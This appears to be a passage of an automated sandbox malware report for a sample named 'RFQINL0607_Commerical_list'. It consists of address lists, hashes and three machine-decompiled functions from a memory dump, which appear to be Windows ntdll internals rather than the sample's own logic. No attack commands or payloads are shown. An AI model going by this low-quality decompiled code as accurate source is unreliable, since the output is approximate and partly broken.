                                                                                                                                                                                  0x333f8cc5
                                                                                                                                                                                  0x333f8cc8
                                                                                                                                                                                  0x333f8cca
                                                                                                                                                                                  0x333f8cd0
                                                                                                                                                                                  0x333f8cd6
                                                                                                                                                                                  0x333f8cd6
                                                                                                                                                                                  0x333f8c94
                                                                                                                                                                                  0x333f8c94
                                                                                                                                                                                  0x333f8c96
                                                                                                                                                                                  0x333f8c9c
                                                                                                                                                                                  0x333f8c9f
                                                                                                                                                                                  0x333f8ca3
                                                                                                                                                                                  0x333f8ca5
                                                                                                                                                                                  0x333f8ca9
                                                                                                                                                                                  0x333f8ca9
                                                                                                                                                                                  0x333f8cad
                                                                                                                                                                                  0x333f8cad
                                                                                                                                                                                  0x333f8caf
                                                                                                                                                                                  0x333f8cb1
                                                                                                                                                                                  0x333f8cb5
                                                                                                                                                                                  0x333f8cbb
                                                                                                                                                                                  0x333f8cbb
                                                                                                                                                                                  0x333f8cb5
                                                                                                                                                                                  0x333f8c96
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f8c92
                                                                                                                                                                                  0x333f8bae
                                                                                                                                                                                  0x333f8bae
                                                                                                                                                                                  0x333f8f6d
                                                                                                                                                                                  0x333f8f73
                                                                                                                                                                                  0x333f8f73

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: ${?3
                                                                                                                                                                                  • API String ID: 0-2990857496
                                                                                                                                                                                  • Opcode ID: 22bde482872b5b46f30bfbe0db54676dedae0898e510a77faf730a06e4329fdb
                                                                                                                                                                                  • Instruction ID: 0aeef7ed575c1cf21f52572ffff794b7756b92696c981586f9323900f8e311a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 22bde482872b5b46f30bfbe0db54676dedae0898e510a77faf730a06e4329fdb
                                                                                                                                                                                  • Instruction Fuzzy Hash: BEB1BE75A093019FD714CF28C880A5BBBE9FF84755F848A2EF994DB290D732D914CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33384B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                                  			E33384B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x3344b370 ^ _t114;
				_v8 =  *0x3344b370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E33394B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E333A8A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E333A8A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x334465e4; // 0x762bf0e0
															 *0x334491e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E333526A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x334437c0 & 0x00000003) != 0) {
																		E333CE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x334437c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x334437c0 & 0x00000005) != 0) {
																		_push(_t113);
																		E333CE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t110 + 0x24);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}





























                                                                                                                                                                                  0x33384b79
                                                                                                                                                                                  0x33384b86
                                                                                                                                                                                  0x33384b88
                                                                                                                                                                                  0x33384b8e
                                                                                                                                                                                  0x33384b90
                                                                                                                                                                                  0x33384b93
                                                                                                                                                                                  0x33384b97
                                                                                                                                                                                  0x33384c27
                                                                                                                                                                                  0x33384c35
                                                                                                                                                                                  0x33384ba7
                                                                                                                                                                                  0x33384ba7
                                                                                                                                                                                  0x33384baa
                                                                                                                                                                                  0x33384bac
                                                                                                                                                                                  0x33384bb2
                                                                                                                                                                                  0x33384bb2
                                                                                                                                                                                  0x33384bb5
                                                                                                                                                                                  0x33384bbc
                                                                                                                                                                                  0x333c330f
                                                                                                                                                                                  0x333c3316
                                                                                                                                                                                  0x333c3317
                                                                                                                                                                                  0x333c331e
                                                                                                                                                                                  0x333c3321
                                                                                                                                                                                  0x333c3324
                                                                                                                                                                                  0x333c3327
                                                                                                                                                                                  0x333c332a
                                                                                                                                                                                  0x333c3331
                                                                                                                                                                                  0x333c3334
                                                                                                                                                                                  0x333c3339
                                                                                                                                                                                  0x333c333e
                                                                                                                                                                                  0x333c333e
                                                                                                                                                                                  0x33384bca
                                                                                                                                                                                  0x333c3344
                                                                                                                                                                                  0x333c334b
                                                                                                                                                                                  0x333c334c
                                                                                                                                                                                  0x333c3353
                                                                                                                                                                                  0x333c3356
                                                                                                                                                                                  0x333c335d
                                                                                                                                                                                  0x333c3360
                                                                                                                                                                                  0x333c3363
                                                                                                                                                                                  0x333c336a
                                                                                                                                                                                  0x333c336d
                                                                                                                                                                                  0x333c3372
                                                                                                                                                                                  0x333c3372
                                                                                                                                                                                  0x33384bd0
                                                                                                                                                                                  0x33384bd0
                                                                                                                                                                                  0x33384bd5
                                                                                                                                                                                  0x33384c36
                                                                                                                                                                                  0x33384c36
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384bd7
                                                                                                                                                                                  0x33384bd7
                                                                                                                                                                                  0x33384bd7
                                                                                                                                                                                  0x33384bdf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384be1
                                                                                                                                                                                  0x33384be3
                                                                                                                                                                                  0x33384bec
                                                                                                                                                                                  0x33384bef
                                                                                                                                                                                  0x33384bf0
                                                                                                                                                                                  0x33384bf9
                                                                                                                                                                                  0x33384bfd
                                                                                                                                                                                  0x33384bff
                                                                                                                                                                                  0x33384c04
                                                                                                                                                                                  0x33384c06
                                                                                                                                                                                  0x33384c07
                                                                                                                                                                                  0x33384c0a
                                                                                                                                                                                  0x33384c0c
                                                                                                                                                                                  0x33384c0f
                                                                                                                                                                                  0x33384c1a
                                                                                                                                                                                  0x33384c1c
                                                                                                                                                                                  0x33384c21
                                                                                                                                                                                  0x333c337a
                                                                                                                                                                                  0x333c337a
                                                                                                                                                                                  0x333c337d
                                                                                                                                                                                  0x333c337d
                                                                                                                                                                                  0x333c3384
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3386
                                                                                                                                                                                  0x333c3386
                                                                                                                                                                                  0x333c338b
                                                                                                                                                                                  0x333c33b2
                                                                                                                                                                                  0x333c33b5
                                                                                                                                                                                  0x333c33b9
                                                                                                                                                                                  0x333c33be
                                                                                                                                                                                  0x333c33f7
                                                                                                                                                                                  0x333c33f7
                                                                                                                                                                                  0x33384c76
                                                                                                                                                                                  0x33384c84
                                                                                                                                                                                  0x33384c8c
                                                                                                                                                                                  0x33384c90
                                                                                                                                                                                  0x33384ca9
                                                                                                                                                                                  0x33384ca9
                                                                                                                                                                                  0x33384cae
                                                                                                                                                                                  0x33384ce4
                                                                                                                                                                                  0x33384cee
                                                                                                                                                                                  0x33384cf3
                                                                                                                                                                                  0x33384cf3
                                                                                                                                                                                  0x33384ce6
                                                                                                                                                                                  0x33384ce6
                                                                                                                                                                                  0x33384cb2
                                                                                                                                                                                  0x333c3463
                                                                                                                                                                                  0x333c347b
                                                                                                                                                                                  0x333c3480
                                                                                                                                                                                  0x333c348a
                                                                                                                                                                                  0x333c3490
                                                                                                                                                                                  0x333c3490
                                                                                                                                                                                  0x333c348a
                                                                                                                                                                                  0x33384cbe
                                                                                                                                                                                  0x33384c92
                                                                                                                                                                                  0x33384c98
                                                                                                                                                                                  0x33384cc5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c3423
                                                                                                                                                                                  0x333c3429
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c342f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c342f
                                                                                                                                                                                  0x333c3429
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384c9a
                                                                                                                                                                                  0x33384c9a
                                                                                                                                                                                  0x33384ca1
                                                                                                                                                                                  0x333c3434
                                                                                                                                                                                  0x333c344f
                                                                                                                                                                                  0x333c3454
                                                                                                                                                                                  0x333c3454
                                                                                                                                                                                  0x33384ca7
                                                                                                                                                                                  0x33384ca7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384c98
                                                                                                                                                                                  0x333c3391
                                                                                                                                                                                  0x333c3398
                                                                                                                                                                                  0x333c339c
                                                                                                                                                                                  0x333c33a2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c33a2
                                                                                                                                                                                  0x333c338b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c33a7
                                                                                                                                                                                  0x333c33a7
                                                                                                                                                                                  0x333c33a9
                                                                                                                                                                                  0x333c33ad
                                                                                                                                                                                  0x33384c21
                                                                                                                                                                                  0x33384c1a
                                                                                                                                                                                  0x33384c04
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384bfd
                                                                                                                                                                                  0x33384bdf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384bd5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33384bac
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 0$Flst
                                                                                                                                                                                  • API String ID: 0-758220159
                                                                                                                                                                                  • Opcode ID: c6d355a65f85b2c7a4537f3d2d1113ebab10678639776271ea0581325e2ad2f5
                                                                                                                                                                                  • Instruction ID: f27e75f55cf7f97519d3ba7a077cdf5166e99e881811bc424a6f312aa00d8695
                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d355a65f85b2c7a4537f3d2d1113ebab10678639776271ea0581325e2ad2f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51ADB5E003589FEB15CF98C984799FBF9EF44794F18C02AD045AF650EB749989CB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33350485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                                                  			E33350485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x33446630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E333582E0(0xabababab, 0, "kLsE", 0);
					 *0x33446630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(L33375C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E33350670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E33350670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E33350630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E33395050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E33393EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E33350690) {
					 *0x334491e0();
					_t50 =  *_t73();
				} else {
					_t50 = E33350690();
				}
				_t84 = _t50;
				goto L4;
			}


















                                                                                                                                                                                  0x3335048f
                                                                                                                                                                                  0x33350493
                                                                                                                                                                                  0x3335049a
                                                                                                                                                                                  0x333504a0
                                                                                                                                                                                  0x333504a3
                                                                                                                                                                                  0x333504a6
                                                                                                                                                                                  0x333504af
                                                                                                                                                                                  0x333504b8
                                                                                                                                                                                  0x333504c2
                                                                                                                                                                                  0x333504cb
                                                                                                                                                                                  0x333504ce
                                                                                                                                                                                  0x333504d2
                                                                                                                                                                                  0x333504d6
                                                                                                                                                                                  0x3335060e
                                                                                                                                                                                  0x33350610
                                                                                                                                                                                  0x33350618
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333504ef
                                                                                                                                                                                  0x333504ef
                                                                                                                                                                                  0x333504f2
                                                                                                                                                                                  0x333505e3
                                                                                                                                                                                  0x333505ea
                                                                                                                                                                                  0x333505f1
                                                                                                                                                                                  0x333505f1
                                                                                                                                                                                  0x33350501
                                                                                                                                                                                  0x33350501
                                                                                                                                                                                  0x33350504
                                                                                                                                                                                  0x3335050c
                                                                                                                                                                                  0x33350519
                                                                                                                                                                                  0x3335051b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae99c
                                                                                                                                                                                  0x333ae9a2
                                                                                                                                                                                  0x333ae9ac
                                                                                                                                                                                  0x3335051f
                                                                                                                                                                                  0x3335052a
                                                                                                                                                                                  0x333ae9b9
                                                                                                                                                                                  0x333505cd
                                                                                                                                                                                  0x333505d3
                                                                                                                                                                                  0x333505d3
                                                                                                                                                                                  0x333ae9bf
                                                                                                                                                                                  0x3335053c
                                                                                                                                                                                  0x3335054d
                                                                                                                                                                                  0x33350559
                                                                                                                                                                                  0x33350562
                                                                                                                                                                                  0x333ae9ce
                                                                                                                                                                                  0x333ae9ce
                                                                                                                                                                                  0x3335056a
                                                                                                                                                                                  0x3335057b
                                                                                                                                                                                  0x33350580
                                                                                                                                                                                  0x33350580
                                                                                                                                                                                  0x3335058f
                                                                                                                                                                                  0x33350597
                                                                                                                                                                                  0x33350598
                                                                                                                                                                                  0x3335059d
                                                                                                                                                                                  0x333505a1
                                                                                                                                                                                  0x333505a5
                                                                                                                                                                                  0x333505ad
                                                                                                                                                                                  0x333505b3
                                                                                                                                                                                  0x333ae9dd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae9ed
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae9ed
                                                                                                                                                                                  0x333ae9dd
                                                                                                                                                                                  0x333505b9
                                                                                                                                                                                  0x333505be
                                                                                                                                                                                  0x333505c7
                                                                                                                                                                                  0x333ae9f2
                                                                                                                                                                                  0x333ae9f2
                                                                                                                                                                                  0x333505c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333505ad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae9b2
                                                                                                                                                                                  0x3335050c
                                                                                                                                                                                  0x333504fb
                                                                                                                                                                                  0x333ae989
                                                                                                                                                                                  0x333ae990
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae990
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333504fb
                                                                                                                                                                                  0x333504dc
                                                                                                                                                                                  0x333504e2
                                                                                                                                                                                  0x333505d6
                                                                                                                                                                                  0x333505dc
                                                                                                                                                                                  0x333504e8
                                                                                                                                                                                  0x333504e8
                                                                                                                                                                                  0x333504e8
                                                                                                                                                                                  0x333504ed
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • kLsE, xrefs: 333505FE
                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33350586
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                  • API String ID: 3446177414-2547482624
                                                                                                                                                                                  • Opcode ID: 1e8d17b5034e452f375a3cc15c1222a54a868a9dddd9caf51452e3cf916df0ad
                                                                                                                                                                                  • Instruction ID: 5b7d6feeee28cac0ac9a5b8fc4d0333ceee0a42d27d0c416e7fa07694fc60be6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e8d17b5034e452f375a3cc15c1222a54a868a9dddd9caf51452e3cf916df0ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: BD51AEB5A05746DFFB10DFA4C880AEAB7F8AF44300F04C83EE59597650EB3A9545CB62
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 52%
                                                                                                                                                                                  			E3334E67A(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr* _a8, char _a12) {
				void* _t29;
				intOrPtr _t31;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr _t57;
				intOrPtr _t60;
				char _t63;
				signed int _t66;
				signed int _t67;
				signed int _t71;

				_t65 = __edx;
				_t48 = __ecx;
				_t29 = 3;
				_t63 = 0;
				_t66 =  *(__ecx + 0x36) & 0x0000ffff;
				if( *__edx != _t29) {
					if( *__edx == 4) {
						_t67 = _t66 & 0x00003fff;
						if(_t67 == _t29 || _t67 == 2) {
							_t50 = _a4;
							asm("cdq");
							 *_t50 =  *((intOrPtr*)(_t48 + 0x30));
							 *((intOrPtr*)(_t50 + 4)) = _t63;
							_t31 = E3338FF50(_t65);
							_t63 = 1;
							 *_a8 = _t31;
							_t22 =  &_a12; // 0x3334e65e
							 *((char*)( *_t22)) = 1;
						}
						L7:
						return _t63;
					}
					if((_t66 & 0x00003fff) !=  *__edx) {
						if((_t66 & 0x00003fff) == 0xa &&  *__edx == 7 &&  *((intOrPtr*)(__edx + 0x24)) ==  *((intOrPtr*)( *[fs:0x18] + 0x20))) {
							 *0x334491e0(__edx,  *((intOrPtr*)(__ecx + 0x20)));
							 *_a8 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))))();
							_t28 =  &_a12; // 0x3334e65e
							 *((char*)( *_t28)) = 1;
							L6:
							_t63 = 0;
						}
						goto L7;
					}
					asm("cdq");
					_t57 =  *((intOrPtr*)(__ecx + 0x30));
					 *((intOrPtr*)(__edx + 0x1c)) = 0;
					_t40 = _a4;
					 *((intOrPtr*)(__edx + 0x18)) = _t57;
					 *_t40 = _t57;
					 *((intOrPtr*)(_t40 + 4)) = 0;
					 *0x334491e0(__edx,  *((intOrPtr*)(__ecx + 0x20)));
					 *_a8 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))))();
					L5:
					_t8 =  &_a12; // 0x3334e65e
					 *((char*)( *_t8)) = 1;
					goto L6;
				}
				_t71 = _t66 & 0x00003fff;
				if(_t71 != _t29) {
					if(_t71 == 2) {
						goto L2;
					}
					goto L7;
				}
				L2:
				if( *((intOrPtr*)(_t65 + 0x4e)) < _t63) {
					_t44 =  *0x334441d0; // 0x2fe05b8
					if(_t44 == 0) {
						goto L3;
					}
					_t17 = _t44 + 0x30; // 0x6c
					_t45 =  *_t17;
					L4:
					asm("cdq");
					_t60 = _t45;
					_t46 = _a4;
					 *_t46 = _t60;
					 *((intOrPtr*)(_t46 + 4)) = _t63;
					 *((intOrPtr*)(_t65 + 0x18)) = _t60;
					 *((intOrPtr*)(_t65 + 0x1c)) = _t63;
					L33350D9F(_t48, _t65);
					goto L5;
				}
				L3:
				_t45 =  *((intOrPtr*)(_t48 + 0x30));
				goto L4;
			}

















                                                                                                                                                                                  0x3334e682
                                                                                                                                                                                  0x3334e684
                                                                                                                                                                                  0x3334e688
                                                                                                                                                                                  0x3334e689
                                                                                                                                                                                  0x3334e68b
                                                                                                                                                                                  0x3334e691
                                                                                                                                                                                  0x3334e6d5
                                                                                                                                                                                  0x333ad929
                                                                                                                                                                                  0x333ad932
                                                                                                                                                                                  0x333ad93e
                                                                                                                                                                                  0x333ad944
                                                                                                                                                                                  0x333ad946
                                                                                                                                                                                  0x333ad948
                                                                                                                                                                                  0x333ad94b
                                                                                                                                                                                  0x333ad953
                                                                                                                                                                                  0x333ad955
                                                                                                                                                                                  0x333ad957
                                                                                                                                                                                  0x333ad95a
                                                                                                                                                                                  0x333ad95a
                                                                                                                                                                                  0x3334e6cb
                                                                                                                                                                                  0x3334e6cf
                                                                                                                                                                                  0x3334e6cf
                                                                                                                                                                                  0x3334e6e6
                                                                                                                                                                                  0x333ad968
                                                                                                                                                                                  0x333ad993
                                                                                                                                                                                  0x333ad99e
                                                                                                                                                                                  0x333ad9a0
                                                                                                                                                                                  0x333ad9a3
                                                                                                                                                                                  0x3334e6c7
                                                                                                                                                                                  0x3334e6c7
                                                                                                                                                                                  0x3334e6c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ad968
                                                                                                                                                                                  0x3334e6ef
                                                                                                                                                                                  0x3334e6f0
                                                                                                                                                                                  0x3334e6f2
                                                                                                                                                                                  0x3334e6f5
                                                                                                                                                                                  0x3334e6f8
                                                                                                                                                                                  0x3334e701
                                                                                                                                                                                  0x3334e706
                                                                                                                                                                                  0x3334e709
                                                                                                                                                                                  0x3334e714
                                                                                                                                                                                  0x3334e6c1
                                                                                                                                                                                  0x3334e6c1
                                                                                                                                                                                  0x3334e6c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334e6c4
                                                                                                                                                                                  0x3334e693
                                                                                                                                                                                  0x3334e69c
                                                                                                                                                                                  0x3334e71c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334e71e
                                                                                                                                                                                  0x3334e69e
                                                                                                                                                                                  0x3334e6a2
                                                                                                                                                                                  0x3334e720
                                                                                                                                                                                  0x3334e727
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334e72d
                                                                                                                                                                                  0x3334e72d
                                                                                                                                                                                  0x3334e6a7
                                                                                                                                                                                  0x3334e6a7
                                                                                                                                                                                  0x3334e6a8
                                                                                                                                                                                  0x3334e6aa
                                                                                                                                                                                  0x3334e6ad
                                                                                                                                                                                  0x3334e6af
